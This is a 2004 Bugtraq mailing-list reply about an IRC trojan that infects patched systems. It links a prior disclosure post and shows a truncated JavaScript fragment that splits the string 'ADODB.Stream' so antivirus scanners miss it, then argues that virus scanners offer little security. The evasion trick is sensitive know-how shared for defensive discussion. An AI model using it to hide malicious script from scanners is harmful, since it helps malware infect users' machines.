Date: Tue, 15 Jun 2004 04:20:57 +0200
From: Jelmer <jkuperus@...net.nl>
To: 'Rusty Chiles' <rustychiles@....net>, bugtraq@...urityfocus.com
Subject: RE: New IRC Trojan -Symantec and Trend Micro Unable To Stop Infection

*Sigh* here we go again, It uses the code I outlined in this post to infect
fully patched systems

http://seclists.org/lists/fulldisclosure/2004/Jun/0124.html

Manu virus scanners mark an html file as containing a virus when it contains

Adodb.stream, the authors (trivially as always) solved that like this

function bla() { return "A" + "D" + "O" + "D" + "B" + "." + "S" + "t" + "r"

so it doesn't get detected

Virus scanners really offer very little security, and shouldn't be relied
upon